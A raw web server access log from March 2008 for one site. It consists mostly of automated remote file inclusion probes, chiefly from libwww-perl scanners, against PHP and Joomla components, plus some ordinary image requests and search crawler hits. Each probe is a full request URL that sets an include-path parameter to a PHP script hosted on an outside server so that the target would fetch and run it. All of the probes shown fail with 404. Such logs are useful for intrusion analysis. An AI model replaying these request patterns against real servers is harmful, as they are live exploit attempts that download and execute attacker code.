87.230.7.194 - - [27/Mar/2008:09:26:41 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:26:46 -0700] "GET /logs/access_080313.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
198.169.127.116 - - [27/Mar/2008:09:27:02 -0700] "GET /logs/access_080117.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.169.127.116 - - [27/Mar/2008:09:27:02 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.169.127.116 - - [27/Mar/2008:09:27:02 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:27:21 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:27:22 -0700] "GET /homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:27:22 -0700] "GET /logs/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:09:27:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:09:27:38 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.195.44.94 - - [27/Mar/2008:09:27:48 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:27:54 -0700] "GET /logs/access_080306.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [27/Mar/2008:09:27:54 -0700] "GET /logs//index.php?option=com_expose&Itemid2=&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.249.117.99 - - [27/Mar/2008:09:27:54 -0700] "GET //index.php?option=com_expose&Itemid2=&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:27:59 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:00 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:01 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:03 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:03 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:20 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:20 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:28:32 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:28:38 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:09:28:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:09:28:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:28:59 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:28:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:29:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.7.228.225 - - [27/Mar/2008:09:29:04 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 304 - "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:29:05 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:29:06 -0700] "GET /index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:29:06 -0700] "GET /logs/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:29:08 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:09:29:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:30:01 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:30:01 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:30:01 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:09:30:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:30:05 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:30:06 -0700] "GET /index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:30:07 -0700] "GET /logs/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:30:08 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:30:08 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:30:08 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.94 - - [27/Mar/2008:09:30:09 -0700] "GET /logs/access.log HTTP/1.0" 200 386034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:30:41 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.196.43.232 - - [27/Mar/2008:09:30:55 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:31:24 -0700] "GET /logs/access_080119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:31:25 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:31:25 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:31:26 -0700] "GET /logs/index.php?pagina1=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:31:26 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:31:31 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:31:32 -0700] "GET /index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:31:38 -0700] "GET /logs/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:32:08 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:32:08 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:32:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:32:21 -0700] "GET /logs/access_080306.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:09:32:26 -0700] "GET /logs/access_080218.log/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:09:32:26 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:32:39 -0700] "GET /logs/access_080131.log/index.php?pagina1=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:32:57 -0700] "GET /logs/access_080119.log//?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:33:09 -0700] "GET /logs/access_080218.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.117.159 - - [27/Mar/2008:09:34:47 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:34:50 -0700] "GET /logs/access_080225.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:34:59 -0700] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:35:02 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:35:02 -0700] "GET //config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:35:02 -0700] "GET /logs//config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [27/Mar/2008:09:35:22 -0700] "GET /logs/access_080124.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:35:23 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:09:35:28 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:09:35:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:09:35:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:35:49 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:35:50 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:35:50 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:36:07 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:36:08 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:36:08 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:09 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:09 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:10 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:10 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:10 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:36:10 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:36:38 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:09:36:41 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:36:42 -0700] "GET /index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:36:42 -0700] "GET /logs/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:09:36:42 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:37:10 -0700] "GET /logs/access_080215.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:37:11 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:37:12 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:37:12 -0700] "GET /homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:37:13 -0700] "GET /logs/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:37:13 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:09:37:19 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.169.127.116 - - [27/Mar/2008:09:37:21 -0700] "GET /logs/access_080125.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:37:29 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:37:30 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:37:30 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:37:37 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:09:37:37 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:37:53 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
